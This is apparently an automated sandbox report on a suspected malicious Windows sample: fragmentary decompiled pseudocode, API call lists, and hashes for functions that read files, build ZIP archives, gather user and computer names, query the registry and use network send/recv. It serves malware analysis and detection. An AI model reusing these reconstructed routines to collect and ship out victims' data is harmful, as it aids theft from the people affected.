				void* _t40;
				void* _t45;
				signed int _t46;
				signed int _t47;
				void* _t48;
				signed int* _t49;

				_t24 = E0041F3F0(0x1004c);
				_t49 = _t48 - _t24;
				_t34 = _a65616;
				_t46 = _a65620;
				if(_t34 != 0) {
					_t45 =  &_a48;
					_t40 =  &_a12;
					_t24 = memset(_t40, memset(_t45, 0, 0x4000 << 2), 9 << 2);
					_t49 =  &(_t49[6]);
					_v12 = _t40;
					 *_t49 = _t46;
					L0041F7B4();
					if(_t24 != 0) {
						goto L1;
					} else {
						_t28 = _a18;
						if((_t28 & 0x00000080) == 0) {
							 *(_t34 + 0x4e008) =  *(_t34 + 0x4e008) | 0x00000001;
						}
						 *(_t34 + 0x4e008) =  *(_t34 + 0x4e008) | _t28 << 0x00000010;
						 *((intOrPtr*)(_t34 + 0x4e00c)) = _a40;
						 *_t49 = _t46;
						_v12 = 0x424983;
						_t24 = fopen(??, ??);
						_t47 = _t24;
						if(_t24 == 0) {
							goto L1;
						} else {
							while(1) {
								_v4 = _t47;
								_v8 = 0x10000;
								_v12 = 1;
								 *_t49 = _t45;
								_t31 = fread(??, ??, ??, ??);
								if(_t31 == 0) {
									break;
								}
								_v8 = _t31;
								_v12 = _t45;
								 *_t49 = _t34;
								if(E0041EC81(_t31) >= 0) {
									continue;
								} else {
									_t35 = _t34 | 0xffffffff;
								}
								L10:
								 *_t49 = _t47;
								fclose(??);
								_t27 = _t35;
								goto L11;
							}
							_t35 = 0;
							goto L10;
						}
					}
				} else {
					L1:
					_t27 = _t24 | 0xffffffff;
				}
				L11:
				return _t27;
			}

0x0041ed4b
0x0041ed50
0x0041ed52
0x0041ed59
0x0041ed62
0x0041ed6c
0x0041ed70
0x0041ed86
0x0041ed86
0x0041ed88
0x0041ed8c
0x0041ed8f
0x0041ed96
0x00000000
0x0041ed98
0x0041ed98
0x0041ed9f
0x0041eda1
0x0041eda1
0x0041edab
0x0041edb5
0x0041edbb
0x0041edbe
0x0041edc6
0x0041edcd
0x0041edcf
0x00000000
0x0041edd1
0x0041edd1
0x0041edd1
0x0041edd5
0x0041eddd
0x0041ede5
0x0041ede8
0x0041edef
0x00000000
0x00000000
0x0041edf1
0x0041edf5
0x0041edf9
0x0041ee03
0x00000000
0x0041ee05
0x0041ee05
0x0041ee05
0x0041ee0c
0x0041ee0c
0x0041ee0f
0x0041ee14
0x00000000
0x0041ee14
0x0041ee0a
0x00000000
0x0041ee0a
0x0041edcf
0x0041ed64
0x0041ed64
0x0041ed64
0x0041ed64
0x0041ee16
0x0041ee20

APIs

_stat.MSVCRT ref: 0041ED8F
fopen.MSVCRT ref: 0041EDC6
fread.MSVCRT ref: 0041EDE8
fclose.MSVCRT ref: 0041EE0F

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _statfclosefopenfread
String ID:
API String ID: 804335959-0
Opcode ID: e49dcea1558de36b6d26133dc736d865fdae275fbb071cb261454f55feb63192
Instruction ID: c86c0b954f8f68680828bf3fb845d0a681b1f2494741e4076b806c5f4ecabbb7
Opcode Fuzzy Hash: e49dcea1558de36b6d26133dc736d865fdae275fbb071cb261454f55feb63192
Instruction Fuzzy Hash: 68216F746083058ED760AF2AD48039BBBE4EF88754F00893EEDACC7381D67984C58B5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041C5A7, Relevance: 6.1, APIs: 4, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E0041C5A7(signed int* _a4, struct _IO_FILE* _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v40;
				struct _IO_FILE* _t13;
				int _t15;
				void* _t19;
				void* _t22;
				signed int* _t24;
				struct _IO_FILE* _t26;
				void* _t27;
				signed int _t28;
				void* _t30;
				struct _IO_FILE** _t31;

				_t27 = 0;
				_t31 = _t30 - 0x1c;
				_v40 = 0x424983;
				_t24 = _a4;
				 *_t31 = _a8;
				_t13 = fopen(??, ??);
				if(_t13 == 0) {
					L8:
					return _t27;
				}
				_v36 = 2;
				_v40 = 0;
				_t26 = _t13;
				 *_t31 = _t13;
				_t15 = fseek(??, ??, ??);
				 *_t31 = _t26;
				if(_t15 != 0) {
					L4:
					fclose();
					goto L8;
				}
				_t28 = ftell();
				_t19 = E0041606C(_t24);
				_t27 = _t19;
				if(_t19 != 0) {
					_t24[0xe] = E004161B5;
					_t24[0x11] = _t24;
					 *(_t24[0x12] + 0x3c) = _t26;
					 *_t24 = _t28;
					_t24[1] = _t28 >> 0x1f;
					_t22 = E00416619(_t24, _a12, __eflags);
					__eflags = _t22;
					_t27 = _t22;
					if(_t22 != 0) {
						_t27 = 1;
					} else {
						 *_t31 = _t24;
						E0041C416();
					}
					goto L8;
				}
				 *_t31 = _t26;
				goto L4;
			}

0x0041c5ab
0x0041c5ad
0x0041c5b4
0x0041c5bc
0x0041c5c0
0x0041c5c3
0x0041c5ca
0x0041c643
0x0041c64c
0x0041c64c
0x0041c5cc
0x0041c5d4
0x0041c5dc
0x0041c5de
0x0041c5e1
0x0041c5e8
0x0041c5eb
0x0041c604
0x0041c604
0x00000000
0x0041c604
0x0041c5f2
0x0041c5f6
0x0041c5fd
0x0041c5ff
0x0041c612
0x0041c619
0x0041c61c
0x0041c61f
0x0041c624
0x0041c629
0x0041c62e
0x0041c630
0x0041c632
0x0041c63e
0x0041c634
0x0041c634
0x0041c637
0x0041c637
0x00000000
0x0041c632
0x0041c601
0x00000000

APIs

fopen.MSVCRT ref: 0041C5C3
fseek.MSVCRT ref: 0041C5E1
ftell.MSVCRT ref: 0041C5ED
fclose.MSVCRT ref: 0041C604

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclosefopenfseekftell
String ID:
API String ID: 256789196-0
Opcode ID: fbcd7f8cca2f724e403eeb8c4da471501aa33c75eb168f4f61c33f7ffa932136
Instruction ID: bcb064d2d33ab52115c011aa6cdc5be578be0ddba1a55773f7ee6e5998b39b7e
Opcode Fuzzy Hash: fbcd7f8cca2f724e403eeb8c4da471501aa33c75eb168f4f61c33f7ffa932136
Instruction Fuzzy Hash: F211A9B09083008FC710BF2AC9C439ABAE4EF44358F45547EE884CB306E779C8858B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00407FC3, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

fgetpos.MSVCRT ref: 00407FE9
fflush.MSVCRT ref: 00408009
_filelengthi64.MSVCRT ref: 00408014
fsetpos.MSVCRT ref: 00408036

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _filelengthi64fflushfgetposfsetpos
String ID:
API String ID: 3378604764-0
Opcode ID: 5f1deec734a469d50075acdb6f3c09bf06809ba4cbfcd9c78d95f8229e1196b0
Instruction ID: 7f20a3f538c1e1996cb4a193f62903fdb6249973c6c490497f882466bb09f182
Opcode Fuzzy Hash: 5f1deec734a469d50075acdb6f3c09bf06809ba4cbfcd9c78d95f8229e1196b0
Instruction Fuzzy Hash: 5A010CB18087128BC710EF25958045BBBE4BE94364F51093FF8D0D3381E638D8899B97

Uniqueness

Uniqueness Score: -1.00%

Function 00406E04, Relevance: 6.0, APIs: 4, Instructions: 32fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00406E3D
GetFileAttributesW.KERNEL32 ref: 00406E48
SetFileAttributesW.KERNEL32 ref: 00406E62
DeleteFileW.KERNEL32 ref: 00406E6C

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: File$Attributes$ByteCharDeleteMultiWide
String ID:
API String ID: 2001991581-0
Opcode ID: fd15abdbbf5f5b452ff235cde9c5fc4b4f27e3640605faa86648c091e64618a3
Instruction ID: e573b4bf2d7f4f29660dffdf4fc2874ff46e14c0fdf453928647ba00820039fc
Opcode Fuzzy Hash: fd15abdbbf5f5b452ff235cde9c5fc4b4f27e3640605faa86648c091e64618a3
Instruction Fuzzy Hash: E1F062F00093029AD710BF39C88525FBFE4AF40354F40892EF5D456282D73C85998B57

Uniqueness

Uniqueness Score: -1.00%

Function 004049CF, Relevance: 5.5, APIs: 4, Instructions: 475COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00404A2F
malloc.MSVCRT ref: 00404A5E
malloc.MSVCRT ref: 00404BBE
malloc.MSVCRT ref: 00404C36

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 4275eca61013efc150f39e41d15500db4927c896ceb4f6f94b199140b28ff20a
Instruction ID: 218a957fe30f9a24676f57bd5ffca8317da6b6ab60db8c5874b423959f2b8a8b
Opcode Fuzzy Hash: 4275eca61013efc150f39e41d15500db4927c896ceb4f6f94b199140b28ff20a
Instruction Fuzzy Hash: F01260B05087608EC711AF62D84523ABBE0AFD5308F45497EE6D49B392EB7C8581CF5E

Uniqueness

Uniqueness Score: -1.00%

Function 00408FE0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00407C77: GetModuleFileNameW.KERNEL32 ref: 00407CA2
Part of subcall function 00407C77: WideCharToMultiByte.KERNEL32 ref: 00407CE3

Part of subcall function 00412D73: getenv.MSVCRT ref: 00412ECA

ExitProcess.KERNEL32 ref: 00409134
fopen.MSVCRT ref: 00409237

Part of subcall function 00406E04: MultiByteToWideChar.KERNEL32 ref: 00406E3D
Part of subcall function 00406E04: GetFileAttributesW.KERNEL32 ref: 00406E48
Part of subcall function 00406E04: SetFileAttributesW.KERNEL32 ref: 00406E62
Part of subcall function 00406E04: DeleteFileW.KERNEL32 ref: 00406E6C

Part of subcall function 00406F1A: MultiByteToWideChar.KERNEL32 ref: 00406F53
Part of subcall function 00406F1A: GetFileAttributesW.KERNEL32 ref: 00406F5E

Part of subcall function 00407EF4: Sleep.KERNEL32 ref: 00407EFE

Strings

r0B, xrefs: 004090AB

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: File$AttributesByteCharMultiWide$DeleteExitModuleNameProcessSleepfopengetenv
String ID: r0B
API String ID: 3425440891-4020269923
Opcode ID: 37d0ce1561ee6bb9c701f51db275a61bfccac64f15fe3377825e8940e65bb3af
Instruction ID: cf1332e757baf714fb04fabdc2a14f291af18396ddc48b811abeeedaa7cc8274
Opcode Fuzzy Hash: 37d0ce1561ee6bb9c701f51db275a61bfccac64f15fe3377825e8940e65bb3af
Instruction Fuzzy Hash: 4D61C7B04087119AD710BF61D64536EBBE1AF81348F41C86EE4C86B383CBBD8985DB5B

Uniqueness

Uniqueness Score: -1.00%

Function 00413748, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

Part of subcall function 004130E8: GetUserNameW.ADVAPI32 ref: 00413112
Part of subcall function 004130E8: WideCharToMultiByte.KERNEL32 ref: 00413154

Part of subcall function 00413040: GetComputerNameW.KERNEL32 ref: 0041307E
Part of subcall function 00413040: WideCharToMultiByte.KERNEL32 ref: 004130C0

Part of subcall function 004134FD: GetTickCount.KERNEL32 ref: 0041352F

Part of subcall function 00407C77: GetModuleFileNameW.KERNEL32 ref: 00407CA2
Part of subcall function 00407C77: WideCharToMultiByte.KERNEL32 ref: 00407CE3

getenv.MSVCRT ref: 00413879
getenv.MSVCRT ref: 00413887

Part of subcall function 00405D7D: EnterCriticalSection.KERNEL32 ref: 00405DAD
Part of subcall function 00405D7D: LeaveCriticalSection.KERNEL32 ref: 00405ECC

Strings

xEB, xrefs: 00413965

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharMultiNameWide$CriticalSectiongetenv$ComputerCountEnterFileLeaveModuleTickUser
String ID: xEB
API String ID: 195117172-2961144582
Opcode ID: fb62eb59387f53985bd42543a62e6c15600361e8d5d43dfcff879b8f1a2c93cb
Instruction ID: 88353113fceb9506f3b36d61bfde8eef9921c9a466ae1bfd82caa565229af05a
Opcode Fuzzy Hash: fb62eb59387f53985bd42543a62e6c15600361e8d5d43dfcff879b8f1a2c93cb
Instruction Fuzzy Hash: A2619CB49087849BD720EF65C18469EFBE0BF89348F408D2EE8D887351E7789548CF5A

Uniqueness

Uniqueness Score: -1.00%

Function 0041DD3F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0041DD3F() {
				unsigned int _t61;
				unsigned int _t64;
				intOrPtr _t73;
				intOrPtr* _t84;
				unsigned short _t89;
				intOrPtr _t99;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;

				_t106 =  *((intOrPtr*)(_t107 + 0x80));
				if(_t106 != 0) {
					_t84 =  *((intOrPtr*)(_t106 + 0x48));
					if(_t84 == 0 ||  *((intOrPtr*)(_t106 + 0x14)) != 2) {
						goto L1;
					} else {
						_t61 =  *(_t106 + 0x10);
						if(_t61 > 0xffff) {
							goto L1;
						}
						 *((intOrPtr*)(_t107 + 0x34)) = 0;
						 *((intOrPtr*)(_t107 + 0x2c)) =  *((intOrPtr*)(_t106 + 4));
						_t99 =  *((intOrPtr*)(_t84 + 4));
						 *((intOrPtr*)(_t107 + 0x28)) =  *_t106;
						 *((intOrPtr*)(_t107 + 0x30)) = _t99;
						 *((intOrPtr*)(_t107 + 0x3c)) = _t99;
						asm("adc edi, 0x0");
						asm("adc ecx, [esp+0x34]");
						if( *((intOrPtr*)(_t107 + 0x2c)) > 0) {
							goto L1;
						}
						if(_t61 == 0) {
							 *((intOrPtr*)(_t107 + 0x30)) = 0;
							 *((intOrPtr*)(_t107 + 0x34)) = 0;
							 *((intOrPtr*)(_t107 + 0x28)) = 0;
							 *((intOrPtr*)(_t107 + 0x2c)) = 0;
							L10:
							memset(_t107 + 0x4a, 0, 0x16 << 0);
							_t108 = _t107 + 0xc;
							_t64 =  *(_t106 + 0x10);
							 *((char*)(_t108 + 0x4a)) = 0x50;
							 *((char*)(_t108 + 0x4b)) = 0x4b;
							 *((char*)(_t108 + 0x4c)) = 5;
							 *((char*)(_t108 + 0x4d)) = 6;
							 *(_t108 + 0x52) = _t64;
							 *(_t108 + 0x54) = _t64;
							_t89 = _t64 >> 8;
							 *(_t108 + 0x53) = _t89;
							 *(_t108 + 0x55) = _t89;
							E00414900(_t108 + 0x56,  *((intOrPtr*)(_t107 + 0x30)));
							E00414900(_t108 + 0x5a,  *((intOrPtr*)(_t108 + 0x28)));
							 *((intOrPtr*)(_t108 + 0x10)) = 0x16;
							 *((intOrPtr*)(_t108 + 0xc)) = _t108 + 0x4a;
							 *((intOrPtr*)(_t108 + 4)) =  *_t106;
							 *((intOrPtr*)(_t108 + 8)) =  *((intOrPtr*)(_t106 + 4));
							 *_t108 =  *((intOrPtr*)(_t106 + 0x44));
							if( *((intOrPtr*)(_t106 + 0x3c))() != 0x16) {
								goto L1;
							}
							_t73 =  *((intOrPtr*)(_t84 + 0x3c));
							if(_t73 != 0) {
								 *_t108 = _t73;
								if(fflush(??) + 1 != 0) {
									goto L12;
								}
								goto L1;
							}
							L12:
							 *_t106 =  *_t106 + 0x16;
							 *((intOrPtr*)(_t106 + 0x14)) = 3;
							asm("adc dword [ebp+0x4], 0x0");
							return 1;
						}
						 *((intOrPtr*)(_t106 + 8)) =  *((intOrPtr*)(_t107 + 0x28));
						 *((intOrPtr*)(_t106 + 0xc)) =  *((intOrPtr*)(_t107 + 0x2c));
						 *((intOrPtr*)(_t107 + 0x10)) =  *((intOrPtr*)(_t107 + 0x3c));
						 *((intOrPtr*)(_t107 + 8)) =  *((intOrPtr*)(_t107 + 0x2c));
						 *((intOrPtr*)(_t107 + 0xc)) =  *_t84;
						 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t107 + 0x28));
						 *_t107 =  *((intOrPtr*)(_t106 + 0x44));
						if( *((intOrPtr*)(_t107 + 0x3c)) !=  *((intOrPtr*)(_t106 + 0x3c))()) {
							goto L1;
						}
						 *_t106 =  *_t106 +  *((intOrPtr*)(_t107 + 0x30));
						asm("adc [ebp+0x4], edx");
						goto L10;
					}
				}
				L1:
				return 0;
			}

0x0041dd46
0x0041dd4f
0x0041dd58
0x0041dd5d
0x00000000
0x0041dd65
0x0041dd65
0x0041dd6d
0x00000000
0x00000000
0x0041dd75
0x0041dd7d
0x0041dd81
0x0041dd84
0x0041dd8c
0x0041dd90
0x0041dd9d
0x0041dda6
0x0041ddad
0x00000000
0x00000000
0x0041ddb1
0x0041de02
0x0041de0a
0x0041de12
0x0041de1a
0x0041de22
0x0041de31
0x0041de31
0x0041de33
0x0041de36
0x0041de3b
0x0041de40
0x0041de45
0x0041de4a
0x0041de50
0x0041de58
0x0041de5c
0x0041de60
0x0041de64
0x0041de71
0x0041de7a
0x0041de82
0x0041de8c
0x0041de90
0x0041de97
0x0041dea0
0x00000000
0x00000000
0x0041dea6
0x0041deab
0x0041dec3
0x0041decc
0x00000000
0x00000000
0x00000000
0x0041dece
0x0041dead
0x0041dead
0x0041deb1
0x0041debd
0x00000000
0x0041debd
0x0041ddbb
0x0041ddc2
0x0041ddc9
0x0041ddcf
0x0041ddd3
0x0041dddb
0x0041dde2
0x0041ddec
0x00000000
0x00000000
0x0041ddf6
0x0041ddfd
0x00000000
0x0041ddfd
0x0041dd5d
0x0041dd51
0x00000000

Strings

P, xrefs: 0041DE36
K, xrefs: 0041DE3B

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID:
String ID: K$P
API String ID: 0-420285281
Opcode ID: 8a69464f70444901d772828418eb0133d86c5c4489e010a0a704677ec8438a85
Instruction ID: 76b3f71e46e7dd39d433d4e4d553b0a2d3546f8e99cb6a452508f90fdc663846
Opcode Fuzzy Hash: 8a69464f70444901d772828418eb0133d86c5c4489e010a0a704677ec8438a85
Instruction Fuzzy Hash: 3F51C0B09083449FCB50CF29C58468BBBE1AF98318F54892EF8988B351E379D985CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0040D420, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D290: CryptAcquireContextA.ADVAPI32 ref: 0040D2E2
Part of subcall function 0040D290: CryptCreateHash.ADVAPI32 ref: 0040D31C
Part of subcall function 0040D290: CryptHashData.ADVAPI32 ref: 0040D34B
Part of subcall function 0040D290: CryptGetHashParam.ADVAPI32 ref: 0040D38A

Part of subcall function 00407F7A: LoadLibraryA.KERNEL32 ref: 00407F84

Part of subcall function 00407F8E: GetProcAddress.KERNEL32 ref: 00407FA0

RegQueryValueExA.ADVAPI32 ref: 0040D4EC
LocalFree.KERNEL32 ref: 0040D5B8

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

Strings

8B, xrefs: 0040D58B

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$AcquireAddressContextCreateDataFreeLibraryLoadLocalParamProcQueryValue_vsnprintf
String ID: 8B
API String ID: 2081058215-1803290843
Opcode ID: 5a86b60eb7b24f86e885ff524fb9dc5150f0e0451a94be218f3f5f5105dd560d
Instruction ID: 3ebc2064e8f7268df4b8e6a934d6e56f21a9b96c1547cc96c36b4704c4ff52fe
Opcode Fuzzy Hash: 5a86b60eb7b24f86e885ff524fb9dc5150f0e0451a94be218f3f5f5105dd560d
Instruction Fuzzy Hash: 78419CB4A083419FD710EF69C58465AFBF0BF85358F00892EE8C897351EB79D588CB86

Uniqueness

Uniqueness Score: -1.00%

Function 004211C0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_assert.MSVCRT ref: 00421315

Strings

pjB, xrefs: 00421306
8, xrefs: 004212FE

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _assert
String ID: 8$pjB
API String ID: 1222420520-722663410
Opcode ID: d0b8bfb88443995b5d46237e8dd2c2796db4cd98f11c714f3134454e1f713599
Instruction ID: 89e7217bd13c7babcd5adc9bb28dc37eee23235c195977e0ffb5d0d95595f474
Opcode Fuzzy Hash: d0b8bfb88443995b5d46237e8dd2c2796db4cd98f11c714f3134454e1f713599
Instruction Fuzzy Hash: E74127707082B14BE3188F1D989413EBFE1ABD6201FCA4AAFF4C5C7252D539D518CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00405811, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

send.WS2_32 ref: 00405878
recv.WS2_32 ref: 004058B7

Strings

.B, xrefs: 004058C7

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: _vsnprintfrecvsend
String ID: .B
API String ID: 2169655391-2011479308
Opcode ID: 2ec24ba702f98473ee5d9a715ab26bdcf3092223efe4a5c028eb6e3fbd3b2434
Instruction ID: 44476910b367cb1c2704fc52ca41c1ffc0a5ae24bf239666488ca44df54fa44d
Opcode Fuzzy Hash: 2ec24ba702f98473ee5d9a715ab26bdcf3092223efe4a5c028eb6e3fbd3b2434
Instruction Fuzzy Hash: 4111E2B1409301AED310AF29D58935FFBE0FF84354F51882EE4D897251D7788989DF96

Uniqueness

Uniqueness Score: -1.00%

Function 00408218, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00408255
GetLocalTime.KERNEL32 ref: 0040825C

Strings

%.4d-%.2d-%.2d %.2d:%.2d:%.2d, xrefs: 00408267

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Time$LocalSystem
String ID: %.4d-%.2d-%.2d %.2d:%.2d:%.2d
API String ID: 1098363292-244208801
Opcode ID: 2c0d27171b227a626090942a01cb7e3bbf324c6d7aa291d0839ae4957e61f002
